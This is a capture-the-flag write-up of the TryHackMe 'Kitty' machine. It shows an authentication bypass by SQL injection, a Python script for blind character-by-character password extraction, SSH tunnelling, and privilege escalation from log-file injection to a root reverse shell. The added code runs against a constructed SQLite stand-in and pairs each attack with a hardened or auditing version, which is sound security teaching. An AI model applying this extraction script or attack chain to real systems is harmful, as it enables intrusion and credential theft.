Kitty
Hello everyone! Today, I'm going to tackle the CTF challenge on the TryHackMe website called "Kitty" created by Hadrian3689, so let's get to work! :)
Enumeration
NMAP SCAN
sudo nmap -p- -sS 10.10.246.78
As usual, I start by finding the open ports, then run the next scan with scripts only on those ports to save time.

Ports 22 and 80 were found.
GOBUSTER
Considering that there is an HTTP server on the host, I will run a gobuster scan in the background while focusing on actively browsing the website.
However, gobuster didn't find anything interesting.
WEB APP
There isn't much on the website; the only options are to log in or create a new account. However, after logging in to a new account, we are greeted with a message that the site is still under construction.


Let's see what we can find on the website using Burp Suite.
I also attempted a simple SQL injection test, but the form filters the text, so I think it's worth a closer look.

Vuln Found - SQLI
When I tried entering the username "kitty" (the task mentioned it's about a kitty website, so I decided to try :)), it bypassed the password and gave access to this account. However, there's nothing on it. Let's try to find the password for "kitty"; maybe it will let us log in to SSH.

NOTE: SQLmap won't work here; the website has some filtering that prevents dumping the entire database, but the filter is poorly implemented, allowing password bypass.
Exploitation
Retrieving database name from boolean sqli
So, the plan is to find out the name of the database. However, manual attempts would be terribly time-consuming, so I decided to practise scripting. After some time spent trying different payloads, this one worked:
Automated script
You can also find it [here on GitHub].

In the next part, we will go deeper.
Table enumeration

Password enumeration
We already know the username "kitty," so let's go straight to the password.

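Since the script itself is only linked above and the screenshots of the table and password enumeration are gone, here is an added example of the same idea. It is not the write-up's script and not the challenge author's code: it runs against a constructed in-memory SQLite login, with a hypothetical blacklist filter standing in for the site's unknown one. The user table, the sample password "Sample-Pass-42", the filter rules and the function names are all assumptions. It shows the three things this write-up relies on (a filter that blocks dumping but not a boolean condition, the password bypass with a comment, and character-by-character extraction) and then runs the same payloads against a parameterised login, where they get nothing.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the challenge's login backend. The real
# schema, filter rules and credentials are not shown in the write-up; the
# table, the sample password and the blacklist below are all assumptions.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('kitty', 'Sample-Pass-42')")

# Hypothetical blacklist filter: it blocks the keywords needed to dump whole
# tables (UNION/SELECT) and statement stacking, but not quotes or comments,
# so a boolean condition on the row being matched still goes through.
BLOCKED = re.compile(r"union|select|;", re.IGNORECASE)


def login_vulnerable(username: str, password: str) -> bool:
    """Filtered but still injectable: the inputs are concatenated into SQL."""
    if BLOCKED.search(username) or BLOCKED.search(password):
        return False  # the filter rejected the request
    query = (f"SELECT 1 FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone() is not None


def login_hardened(username: str, password: str) -> bool:
    """Parameterised query: input is data, never SQL, so no filter is needed."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


def extract_password(login, user: str = "kitty", max_len: int = 64) -> str:
    """Recover the matched row's password one character at a time using only
    the login's true/false answer (boolean-based blind injection).

    Each character costs eight requests: one length check plus a binary
    search over printable ASCII. That burst of near-identical logins is
    also what a defender sees in the web server access log."""

    def oracle(condition: str) -> bool:
        # The trailing comment swallows the original AND password='...' part.
        return login(f"{user}' AND {condition} -- ", "x")

    recovered = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length(password) >= {pos}"):
            break  # past the end of the secret
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(password, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    print("auth bypass on filtered login:", login_vulnerable("kitty' -- ", "wrong"))
    print("same payload on hardened login:", login_hardened("kitty' -- ", "wrong"))
    print("blind extraction, filtered login:", extract_password(login_vulnerable))
    print("blind extraction, hardened login:", repr(extract_password(login_hardened)))
```

The hardened variant needs no keyword filter at all: the recovered string is empty because the injected text is compared as a literal username and never becomes SQL. On the detection side, the extraction loop is noisy: eight login requests per character, differing only in one number, from a single source, which is exactly the pattern worth alerting on in the access log.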
So, we have everything; let's see if we can use it to access SSH.

And that's how I got the user flag B)
PrivEsc
To start privesc, I always use the linpeas tool first, available HERE. I uploaded it to the /tmp folder on the machine, made it executable with chmod +x, and ran the script.

As seen on the host, there's another web page available, this time on port 8080, but we can't reach it from our machine. However, we can create an SSH tunnel that forwards local port 8081 to port 8080 on the target, allowing direct access from the browser B)


I saw the above page, but I don't know the passwords. Instead, I noticed that linpeas found passwords hidden in a PHP configuration file - a good sign.
I decided to log into the local database using these passwords, and it worked.

We see another database worth searching.

We find the same passwords as on the first page.
hmm…
The website itself turns out to be exactly the same - but is it really?
I decided to check using the diff command.
NOTE FROM AUTHOR: Sorry, the screenshot was lost in the process of writing this. Thanks for understanding.
It appears that the script fetches the IP of the user who performs the SQLi and saves it to /var/www/development/logged, as seen in the previous script. Let's see if we can use this for our purposes.

Let's try something like this: instead of an IP, we will send arbitrary text, which should be saved in the development/logged file, as we saw in the previous script. Everything is prefixed with a payload that triggers the SQLi filter.
If it works, let's check if we can get a reverse shell here.
I created a simple bash script in the /tmp folder named revshell.sh.
The script worked, giving us a root shell.
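The root cause of this privesc is the logging step: whatever the script believes to be the client's IP is written to /var/www/development/logged without being checked. Below is an added example of that step done both ways; it is not the development site's code and not the challenge author's. The write-up doesn't show how the script obtains the IP, so the X-Forwarded-For header, the one-address-per-line log layout and the function names are assumptions. It also includes the check a defender would run over an existing log file to see whether unvalidated input has already landed in it.

```python
import ipaddress
from pathlib import Path

# Constructed stand-in for the development site's logging step. The write-up
# only tells us that the IP of whoever trips the SQLi filter ends up in
# /var/www/development/logged; how the script obtains that IP is not shown,
# so the header used here is an assumption.
HEADER = "X-Forwarded-For"


def source_ip_trusting(headers: dict, remote_addr: str) -> str:
    """Unsafe: whatever the client puts in the header is returned verbatim,
    which is what lets arbitrary text land in the log file."""
    return headers.get(HEADER, remote_addr)


def source_ip_validated(headers: dict, remote_addr: str) -> str:
    """Hardened: keep the claimed address only if it parses as an IP address;
    otherwise fall back to the address of the TCP peer."""
    claimed = headers.get(HEADER, "").split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(claimed))
    except ValueError:
        return str(ipaddress.ip_address(remote_addr))


def record_attempt(log_path: Path, headers: dict, remote_addr: str) -> str:
    """Append one validated address per line and return what was written."""
    ip = source_ip_validated(headers, remote_addr)
    with log_path.open("a", encoding="utf-8") as fh:
        fh.write(ip + "\n")
    return ip


def audit_logged_file(lines) -> list:
    """Return every non-empty line that is not a bare IP address.

    Anything listed here means the log was written from unvalidated input;
    a file like that must never be executed or sourced by a privileged job."""
    suspicious = []
    for line in lines:
        entry = line.strip()
        if not entry:
            continue
        try:
            ipaddress.ip_address(entry)
        except ValueError:
            suspicious.append(line)
    return suspicious


if __name__ == "__main__":
    import tempfile
    sample = {HEADER: "not an address at all"}  # constructed request header
    print("trusting:", source_ip_trusting(sample, "10.0.0.5"))
    print("validated:", source_ip_validated(sample, "10.0.0.5"))
    with tempfile.TemporaryDirectory() as d:
        log = Path(d) / "logged"
        record_attempt(log, sample, "10.0.0.5")
        record_attempt(log, {HEADER: "203.0.113.7"}, "10.0.0.5")
        print(log.read_text().splitlines())
        print("suspicious:", audit_logged_file(["203.0.113.7\n", "this is not an ip\n"]))
```

Validation alone closes the injection, but the second half of the chain matters just as much: a file that any web user can write into should be treated as data, owned by the web server account, and never read by a root job in a way that interprets its contents.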
